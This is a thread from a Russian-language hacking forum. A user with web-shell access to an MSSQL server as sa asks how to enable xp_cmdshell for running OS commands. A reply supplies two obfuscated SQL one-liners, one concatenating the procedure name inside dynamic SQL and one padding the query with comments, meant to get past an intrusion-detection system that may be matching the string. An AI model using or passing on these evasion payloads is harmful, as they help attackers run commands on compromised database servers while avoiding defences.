• XSS.stack #1 – первый литературный журнал от юзеров форума

Не получается включить xp_cmdshell на MSSQL

cerera

CD-диск
Пользователь
Реакции
0
У меня есть доступ к MSSQL Server (веб-шелл).
Работаю через учетку sa, которая имеет права sysadmin
Однако не получается включить xp_cmdshell

Что я делаю:

Включаем доп опции:
EXEC sp_configure 'show advanced options', 1 - OK!
RECONFIGURE - OK!

Однако, когда я пытаюсь
EXEC sp_configure 'xp_cmdshell, 1 - FAIL (ошибки нет, но шелл повисает до таймаута)

Проверяю:
EXEC sp_configure 'xp_cmdshell' однако вижу что ничего не поменялось, значение так и осталось 0.
Т.е. почему-то не включается возможность выполнения комманд , хотя вроде как полный доступ есть.

Попытка выполнить команду через xp_cmdshell опять приводит к задержке и ошибке в логе
SQL Server blocked access to procedure 'sys.xp_cmdshell' ... A system administrator can enable the use of 'xp_cmdshell' by using sp_configure ...

Пожалуйста, подскажите, есть ли какой-то альтернативный метод для включения xp_cmdshell?

вполне возможно ids какой-то строит (задержек/зависонов ведь, по идее, не должно никаких быть - либо сразу результат, либо сразу ошибка), который срабатывает на строку xp_cmdshell

попробуй одной строкой:
так
declare @x CHAR(99);set @x = 'sp_configure "xp'+'_cm'+'dshel'+'l",1;RECONFIGURE';EXEC (@x)

или так
EXEC/**/sp_configure/**/'show advanced options'/**/,/**/1/**/;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell'/*;select '*/,/*'*/1/**/;RECONFIGURE;select 123

Пробовал по-разному. На ids не похоже, ведь все остальные опции таким же образом отрабатывают штатно. А именно xp_cmdshell не хочет включаться. Где его еще могли заблокировать, мне хотя бы сэмулировать ситуацию на своей машине, чтобы понять в чем дело.
Зависоны , как я заметил, появляются при неверных или запросах, которые возвращают ошибки. Скрипт скорее всего ждет результатов, а их нет, отсюда и зависоны.

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх